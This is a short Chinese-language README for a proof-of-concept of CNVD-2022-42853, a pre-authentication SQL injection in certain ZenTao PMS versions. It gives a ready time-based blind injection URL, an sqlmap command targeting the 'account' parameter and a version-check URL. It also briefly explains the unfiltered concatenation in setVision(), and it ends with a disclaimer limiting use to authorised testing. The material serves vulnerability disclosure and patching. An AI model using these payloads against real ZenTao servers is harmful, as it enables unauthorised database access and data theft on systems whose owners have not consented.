└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | ## CNVD-2022-42853
 2 | 
 3 | 禅道（ZenTaoPMS）受影响版本：  
 4 | 
 5 |     开源版：16.5，16.5beta1    
 6 |     企业版：6.5，6.5beta1    
 7 |     旗舰版：3.0，3.0beta1
 8 |     
 9 | ## POC
10 | 
11 | **延时POC**:  
12 |     
13 | `http://ip:port/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b`
14 | 
15 | **SQLMap POC**:    
16 |     
17 | `python sqlmap.py -u http://ip:port/index.php?account=admin -p account --current-user `    
18 | 
19 | ## 查看版本
20 | 
21 | ① `http://ip:port/index.php?mode=getconfig`    
22 |     
23 | ② 登录框看源码    
24 | 
25 | ![image](https://user-images.githubusercontent.com/20917372/181399320-e98e0b71-8622-4f67-b61b-db491dfcb6fb.png)
26 | 
27 | ## 漏洞成因
28 | 
29 | 漏洞点出现在以上版本的**zbox\app\zentao\framework\base\router.class.php**文件里，具体函数为**setVision()**    
30 |     
31 | 该函数未对外界传入的account参数做过滤直接拼接SQL语句，触发SQL注入漏洞    
32 | 
33 | ![image](https://user-images.githubusercontent.com/20917372/181397275-32bdff31-305e-418f-badd-0d4670eb8a63.png)
34 | 
35 | 从代码里可以看到，$account变量支持$_GET和$_POST两种方法传参，可前台SQLi
36 | 
37 | ## 免责声明
38 | 
39 | 漏洞披露时间已过CNVD公开日期，该项目仅对内部安全测试提供参考。对外渗透测试请取得授权进行，否则后果自负，与本项目无关。
40 | 
41 | 
42 | 


--------------------------------------------------------------------------------